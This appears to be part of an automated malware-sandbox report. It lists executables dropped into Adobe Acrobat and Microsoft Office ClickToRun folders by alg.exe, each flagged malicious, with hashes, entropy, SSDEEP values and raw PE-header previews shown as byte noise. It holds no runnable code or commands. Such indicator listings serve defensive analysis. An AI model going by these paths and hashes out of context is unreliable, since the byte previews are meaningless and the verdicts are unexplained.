                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2\.v=..v=..v=...E?.x=..I..|=..I..u=..I..j=..I..p=..bV..q=..v=...=..I..t=..IS.w=..v=;.w=..I..w=..Richv=..........................PE..d....^.c.........."......<...B.......>.........@.....................................\.... ..................................................i..........P.......,...................`X..T............................X..8............P...............................text....;.......<.................. ..`.rdata..$'...P...(...@..............@..@.data................h..............@....pdata..,............l..............@..@.rsrc...P............r..............@..@.reloc...P.......@...z..............@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4151808
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.499792574952584
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:HtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755EDmg27RN:HjEIa4HIEWOc5OD527BWG
                                                                                                                                                                                                                                                                                                                                                    MD5:6509BE0BCC5204E7E614405D9EC9C108
                                                                                                                                                                                                                                                                                                                                                    SHA1:0C19C41935CBD1970A84DA090B6528C831EFF6B0
                                                                                                                                                                                                                                                                                                                                                    SHA-256:8DA873DD2E5BB5368AD5AB0922BB6EB24FEBE34F80A422304A132F79E821E8FF
                                                                                                                                                                                                                                                                                                                                                    SHA-512:DB07BECEBDF482A0E0C240A2F4BA7AFC4240AC0029FFB20B588A1DD1FF51C296890387471DB59F47F06AED276AC02A0709308650BCF2AE23CDFCCB4B1C139B7E
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @..... .?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):59941376
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.999367305075901
                                                                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1572864:LQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:8XhwMhe6AABPiQwF6xQ22R
                                                                                                                                                                                                                                                                                                                                                    MD5:D7F0048E6C3849989FFF8E02D13FBB5D
                                                                                                                                                                                                                                                                                                                                                    SHA1:A8DF71C327B78D65CE69810DDE01C4B034B43C69
                                                                                                                                                                                                                                                                                                                                                    SHA-256:9867BB5D594583A6F6C3C1DAD4A987DA717F09BB6597A4EC72D321AA569F2C69
                                                                                                                                                                                                                                                                                                                                                    SHA-512:476D9445534FFB193D4BA9DDD52972BDE9718C0425FADA86C2ADE479683A5D76A5070FAFA25A8F9CED7B801A019EE56D689FFEC8BC86D029E48ADED0DACCF80B
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0......h..... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1230336
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.185602082284152
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:HejVWYUAlXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:+jkY7lsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:E936C41AE165EDE0FB5703744BE192DC
                                                                                                                                                                                                                                                                                                                                                    SHA1:4CEC7729F68F215F7780B52C59A5B0562BD196F6
                                                                                                                                                                                                                                                                                                                                                    SHA-256:7B4761F43AE59AA9663979A62B5FB91A3C1C972CD16DF910A301CD48B96A7334
                                                                                                                                                                                                                                                                                                                                                    SHA-512:E24FF393A20FD85A9DC0469C00142A4B81428ACE2EB70F23B49D403CFD390D8ADD8ED090C177D9A10DFBEDE5DEBD40F5C0CF5AEA4E4D22402A7B63B63DC51592
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................b....6......6......6.....6.....................M..4......4......4........f....4.....Rich...........................PE..L.....{d.................&...`...............@....@.................................{........................................r..,................................... O..p....................P.......O..@............@..4............................text....%.......&.................. ..`.rdata...@...@...B...*..............@..@.data................l..............@....rsrc................p..............@..@.reloc...`.......P...v..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1384960
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.377807743431448
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:WxwSJhkrmZs5sqjnhMgeiCl7G0nehbGZpbD:Wy+krKs9Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:EAF25D6D16DA10A79E0EB0873D7EAC72
                                                                                                                                                                                                                                                                                                                                                    SHA1:06A636FB4A9125537872BB793316FBF213D7D158
                                                                                                                                                                                                                                                                                                                                                    SHA-256:E6EB1189C1F3F3BB1AF1D1E75300577A133D9690187BBEE68E223A50878DB066
                                                                                                                                                                                                                                                                                                                                                    SHA-512:D28E81A1497BEB634DBBC3B19DFC431FA50F9AB2CE338FF2AD0FD9D80F3BE4A1F0E0DDC1F30DC30683A454A09A2082341D1F7735A81086AED6953BB3A14E0FE7
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................y...5.......5.....5......7.......................7.....7.Z....2...7.....Rich..........................PE..d.....{d.........."..........<.......&.........@....................................(:.... .................................................`...x.... ..............................`j..p....................l..(....j..8............................................text...l........................... ..`.rdata..............................@..@.data...4#..........................@....pdata........... ..................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc...P...0...@..................@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1649152
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.632741003375491
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:yHQJLIRgvsnNksqjnhMgeiCl7G0nehbGZpbD:yHQJL34ADmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:7C963A4D46D6A3FB0D24C6F74917B152
                                                                                                                                                                                                                                                                                                                                                    SHA1:48537B1A4FB8FBBF25D07DF5887BB915E0E40A34
                                                                                                                                                                                                                                                                                                                                                    SHA-256:E3260282248E78F0F4AEDC392A84090EB8234AD86B8341AC50B30423BE5D09C9
                                                                                                                                                                                                                                                                                                                                                    SHA-512:0F670189424F39B4A56EDCEF9F185814C76F1F5BF91DA636C0CB2297590F87C6AA066102B86526D41D7BF3C726F566FB58CCB9801CA7CAC2503000F68AA9531C
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L<."o."o."o...o.."o+.&n.."o+.!n.."o+.#n."o+.'n."o..$n."o..#n.."o).+n.."o.#o;."o).'n."o)..o."o). n."oRich."o........PE..d......d.........."......\.....................@.......................................... .................................................."..@....0...........W..................x...T.......................(...`...8............p..........`....................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data....^...P...R...2..............@....pdata...W.......X..................@..@.didat..8...........................@....msvcjmc..... ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):5365760
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.450980260075343
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:yUZujDjDjDjXmXgoz2PsapFQrC7dRpqbeE8U2IzwDt+bdro4O8b8ITDnlggyJ1kb:9WmXL6DEC7dRpKuDQbg3D527BWG
                                                                                                                                                                                                                                                                                                                                                    MD5:BA3DAC560E755BB4AC03779EB9FB5D1E
                                                                                                                                                                                                                                                                                                                                                    SHA1:8042C23BDACBB417D5A81D473EBC25B68CAFE295
                                                                                                                                                                                                                                                                                                                                                    SHA-256:19C35D36C6DD8E055C7CC530FF327E34E2D664A4EEAF4213580CE988202460B0
                                                                                                                                                                                                                                                                                                                                                    SHA-512:234391DC28E645B7E26055521BD9079B434096420028969C0E0DFC1F0675275B606B1C536F0AFA0D9D02ABA76D6A6894C3A9BD25D1AA15C9C7B390EAB1C1AFFB
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........I.~.(g-.(g-.(g-.Cd,.(g-.Cb,i(g-.G.-.(g-b\c,.(g-b\d,.(g-.t.-.(g-.(g-C(g-b\b,.(g-.Cc,.(g-.Ca,.(g-.Cf,.(g-.(f-.+g-`\b,.(g-`\g,.(g-`\.-.(g-.(.-.(g-`\e,.(g-Rich.(g-........PE..L......d.........."......./..p......P"%.......0...@...........................R.....B.R..............................@:......@:.......;..V...........................^6.T...................._6.....h.5.@.............0...... :.`....................text...*./......./................. ..`.rdata..Ze....0..f....0.............@..@.data....E....:......h:.............@....didat........;......B;.............@....rsrc....V....;..X...H;.............@..@.reloc...P...@G..@....F.............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3163136
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.972781380576439
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:98304:BrZ23AbsK6Ro022JjL2WEiVqJZkD527BWG:lJADmmxL2WEoCZkVQBWG
                                                                                                                                                                                                                                                                                                                                                    MD5:367FA59F93030283A659A3D54D8483F4
                                                                                                                                                                                                                                                                                                                                                    SHA1:0CD3AC1CDCB5C7ABA1C58F40D736BA1BC84338B8
                                                                                                                                                                                                                                                                                                                                                    SHA-256:42BA8EF57A2C63656A67BB1379D41E866950DAD6CEAB336C4537B8058EE8AD89
                                                                                                                                                                                                                                                                                                                                                    SHA-512:4A6549242E9264E844A13EF5340B6F408BF4237047E23A3455F17BB100B5FAACC8C6498901401B53C4DD1309BFA3268227AC9ECAE4F6729EA7B9B2E03D52E050
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5{.!q..rq..rq..rq..r...rQc.r`..rQc.r`..rQc.rp..rQc.rp..rRichq..r........................PE..L.....A.................~... .......^... ........... ........................1.......0.......... .....................................0............................!............................................... ...............................text....|... ...~.................. ..`.data...............................@....rsrc...../......./.................@...................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1213440
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.20491558703228
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:CfrYY42wd7hlOw9fpkEE64JsqjnhMgeiCl7G0nehbGZpbD:bz9xrSNDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:ECA0BAF0369ABCEA9224A9682E5C7A14
                                                                                                                                                                                                                                                                                                                                                    SHA1:80BAC72E5F0AC43665AF3AA2E321CA91E6D07C39
                                                                                                                                                                                                                                                                                                                                                    SHA-256:44507707D6A1D1CE2D3DB3239D0FF11C7C0F958F961535C01157C666F6871A7D
                                                                                                                                                                                                                                                                                                                                                    SHA-512:A089ED26F8DEF40421871FB4EF074384D462AA3ED954E862DEA0F994438D830DD889EC748CC37C360F8190AF816A4F6DC21C5F63A5F72C33819AD76ACAB4187E
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......T...T...T...U...T...U...T..U...T..U...T...U...T..U...T...U...T...Tf..T..U...T..T...T..uT...T..U...TRich...T................PE..d.....{d..........#......J...........3.........@............................. ............ ..................................................L.......`..........(J..................p...T.......................(... B..8............`.......I..`....................text....H.......J.................. ..`.rdata..d....`.......N..............@..@.data...(w...p...&...^..............@....pdata..(J.......L..................@..@.didat.......@......................@..._RDATA.......P......................@..@.rsrc........`......................@...................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1388544
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.272951600867957
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:VwkNKiZ+R2GGNUbTF56Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/T:VzNKUE56sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:FCB439513C71A05C5CEF3CA1FF7D8A74
                                                                                                                                                                                                                                                                                                                                                    SHA1:17F0E69D33F126B8B48DD57D5FC3CC55261C4E0E
                                                                                                                                                                                                                                                                                                                                                    SHA-256:FFBB506D5394E50CAD4291E1DB54FF1F755252E2233A34AE6E5EFCB74C458708
                                                                                                                                                                                                                                                                                                                                                    SHA-512:5F6429BC6D5FE10344D7C8F23163260148E22D70126B6942CD662B0956C75E4C7FEFC9E9A4837C1F8F2BEFACA95FE975D507C8FA600F1B24462256748E6045FB
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........E@..$...$...$...\...$...V*..$...V-..$...V+..$...V/..$...$/.0 ...V&..$...V..$...V..$...V,..$..Rich.$..........PE..d...!!.R.........."......`..........0C.........@.............................P......gl.... .......... ......................................Xl..........X.......d.......................T...................8...(.......8...........`...`............................text...(X.......`.................. ..`.rdata..z....p... ...p..............@..@.data...............................@....pdata..d........ ..................@..@.rsrc...X...........................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):5855744
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.5743376040580515
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:98304:WALuzDKnxCp3JKNrPJzruaI6HMaJTtGbbD527BWG:xaGg3cFPIaI6HMaJTtGbbVQBWG
                                                                                                                                                                                                                                                                                                                                                    MD5:6A67F4A8835DE567675F94C02BF96901
                                                                                                                                                                                                                                                                                                                                                    SHA1:DC0BA86A43ACC5E22B063CF6C2CCB8146916FD59
                                                                                                                                                                                                                                                                                                                                                    SHA-256:B435D2BAA750E46659CBFD974704EC9B00C22CA376BBB257C9190AE7651F0807
                                                                                                                                                                                                                                                                                                                                                    SHA-512:5A13996F1FA342339D20F08164B01D4E31BCB5DE225C004BD543E05E45B855509362C72DF4E1F52E6D9EDFEE896DBCD3A1C6634E0756FE972D86C30CA4987676
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......Jc.M.............p......nx......nx......).......)........p.......p.......p..&....p..............nx..i...kx......kx......kx..g...kxx.............kx......Rich....................PE..d....".e..........".... .z6..........32........@..............................Y.......Z... .................................................8.B.......K..a...PI..%..................0.B.8...................X.B.(.....7.@.............6.0.....B......................text....y6......z6................. ..`.rdata..5.....6......~6.............@..@.data...`....0G.......G.............@....pdata...%...PI..&...:I.............@..@.didat.. .....K......`K.............@..._RDATA..\.....K......fK.............@..@.rsrc....a....K..b...hK.............@..@.reloc........P.......O.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1312768
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.356071962397307
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:vXr/SVMxWtsqjnhMgeiCl7G0nehbGZpbD:T1xkDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:264ECA7E0505D33A7F470E7E398C410F
                                                                                                                                                                                                                                                                                                                                                    SHA1:F9B6AC7300ED37D386B64C71D8F48051432A525E
                                                                                                                                                                                                                                                                                                                                                    SHA-256:7478E57859F718D1790164B01AAAAA2BF11575B07D890067BC7A7E8CE2C6EFCF
                                                                                                                                                                                                                                                                                                                                                    SHA-512:AC26CA008E8122F00CE52AF3AE8BD19208AC06A7B9D06556560554FF8173EEC465FFB8AAF25DC28F631B3B10CEC4B6C17A2525CA9F4C6FF577A1C641B2C6D207
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.k...k...k.......k.......k.......k.......k...k..Ro.......k....l..k.......k....n..k.......k..Rich.k..........PE..L...9.A/.....................T......@V............@..........................P................... ......................................8............................_..T...............................@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...8...........................@..@.reloc...p.......`..................@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):27533312
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.248638103242584
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:196608:NhRrmpGpGdJM7Hbp8JfrCGvqYYuNDmoefAlprtPz25HqaI6HMaJTtGbQOnVQBWG:NhRCpGpMJMrbp8JjpNdNlc5RB
                                                                                                                                                                                                                                                                                                                                                    MD5:6434CFCBEEE1A5112CB3AE797D6E337E
                                                                                                                                                                                                                                                                                                                                                    SHA1:1CDFAA0306E944C54211321D0D7DBED3BBDA4AD6
                                                                                                                                                                                                                                                                                                                                                    SHA-256:1CB8E20A25AF9979A316CF873BE5CA82162B42EC6D12A4C7C08D918F0423B463
                                                                                                                                                                                                                                                                                                                                                    SHA-512:7DBFB6A970E263AA3536CCEEBC1A2E7C1BE0634DD3592B3D802175C09C645530FDCAF9C4365F657DB0CA02481B9733A19C611AE200274693E3445D62AA6C7174
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......$.|+`{.x`{.x`{.xi..xv{.x...yf{.x...yj{.x...yd{.x...yO{.xG..xh{.xG.oxa{.x...yb{.x...ya{.x...ya{.x...yd{.x...yc{.x...y~{.x...y}{.x`{.xTs.x...ya{.x...yjz.x...y v.x...xa{.x`{.xa{.x...ya{.xRich`{.x........PE..d......e..........".... .....H.................@......................................... ..................................................u..D.... ?...X...7.........................8....................U..(...`...@............0.. "..l .......................text............................... ..`.rdata..S.~..0....~.................@..@.data.........1.......0.............@....pdata........7.......7.............@..@.didat..`.....>.......>.............@....detourc.!....>.."....>.............@..@.rsrc.....X.. ?...X...>.............@..@.reloc..............................@...........................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2199552
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.789026310302194
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:083pZ3kd0CuEeN0LUmRXzYs65mfDmg27RnWGj:4KuUQY15wD527BWG
                                                                                                                                                                                                                                                                                                                                                    MD5:29C1C2EE52F68BC4214D00D747B415D2
                                                                                                                                                                                                                                                                                                                                                    SHA1:49EFEE595B2E4FB30EBF52269E12CBBF56D212D0
                                                                                                                                                                                                                                                                                                                                                    SHA-256:493FAAABCE17C754AF5CBD1E8E54F1628522183708740B52B7D8D59385D518A3
                                                                                                                                                                                                                                                                                                                                                    SHA-512:1AE9B680057388EDED732ACA6CE3CD67356680CCF68D4A314E4F8A45EA5460BDA0BD68F414C74DD4F4B4AA74D44314493B112F5D7A375BE5E566ABBFD69FE28A
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D................7......................!..............~............Y.......[............Rich............PE..d...rq............"..................$.........@..............................!......`"... .......... ......................................P...|....p... ......L....................a..T...................Xt..(... s..8............t...............................text...6........................... ..`.rdata..............................@..@.data...@...........................@....pdata..L...........................@..@.rsrc.... ...p...0...P..............@..@.reloc... ..........................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4971008
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.670847648427698
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:yErw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGOpndOPcptz6+MO:MA4oGlcR+glEdOPKzgVZxD527BWG
                                                                                                                                                                                                                                                                                                                                                    MD5:101EE4D517BB29BCACDA5376C6B145A8
                                                                                                                                                                                                                                                                                                                                                    SHA1:B0290DD5CA4382E15A834647B91444C8005C4761
                                                                                                                                                                                                                                                                                                                                                    SHA-256:1393A22E6E04E6CAD19FFAF66C8AACFD68E59F7F7AFB2414AF959A4784FBEF90
                                                                                                                                                                                                                                                                                                                                                    SHA-512:810B44CCAF6C8B1CCD4374C456066EC57C7149C9AAB093D203D899867FA4C60D89BB254773E657F462803CE733265963D29E0D43D48549AC7D584B5181C413FA
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
